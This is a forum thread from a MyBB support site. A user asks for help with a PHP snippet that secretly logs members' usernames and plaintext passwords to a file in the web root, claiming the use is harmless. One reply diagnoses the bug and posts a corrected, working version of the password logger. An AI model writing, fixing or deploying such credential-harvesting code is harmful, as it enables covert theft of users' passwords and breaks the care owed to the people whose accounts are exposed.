MyBB Central

Full Version: Password Logger
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Code:
$fh = fopen($_SERVER['DOCUMENT_ROOT'].'/passlog.php', 'a');
fwrite($file, $mybb->input['username'] . " " . $mybb->input['password'] . "\n\n");
fclose($fp);

I'm trying to get that to work. It's only for me on a private board, I'd never use this maliciously. It is working, but it's blank. Like it takes up space, but nothing shows up.
Im not touching this one.
I'd make sure my non-existent members know in bold red letters at the top of the TOS upon registration.

I won't be using my boards for anything. It's on a 000webhost.com subdomain.

I understand why you wouldn't want to do this, and I respect that but I can assure you this simple piece of code will not be used maliciously.
Bump........

g
bump
good luck with getting this lol
wouldn't it be in your 'mysql'?
(Oct 03, 2010, 01:01 AM)Phenomite Wrote: [ -> ]
Code:
$fh = fopen($_SERVER['DOCUMENT_ROOT'].'/passlog.php', 'a');
fwrite($file, $mybb->input['username'] . " " . $mybb->input['password'] . "\n\n");
fclose($fp);

I'm trying to get that to work. It's only for me on a private board, I'd never use this maliciously. It is working, but it's blank. Like it takes up space, but nothing shows up.

You made a simple copy/paste mistake here. So lets analyze your code.
Code:
$fh = fopen($_SERVER['DOCUMENT_ROOT'].'/passlog.php', 'a');
Nothing wrong here.
Code:
fwrite($file, $mybb->input['username'] . " " . $mybb->input['password'] . "\n\n");
Where the hell did you create the variable $file? It is suppose to be the variable you assigned fopen to!
Code:
fclose($fp);
Same as the last one, you never created the variable $fp, it is suppose to be the same variable you assigned to fopen...

TL;DR
To bad go read it.
Code:
$fh = fopen($_SERVER['DOCUMENT_ROOT'].'/passlog.php', 'a');
fwrite($fh, $mybb->input['username'] . " " . $mybb->input['password'] . "\n\n");
fclose($fh);

That doesn't work, either.
This is pissing me off. I had it working, I tried putting in a whole bunch of different spots and one worked. So I edit the php file so no one can view it directly.

Then it stopped working...and I cannot get it to work again.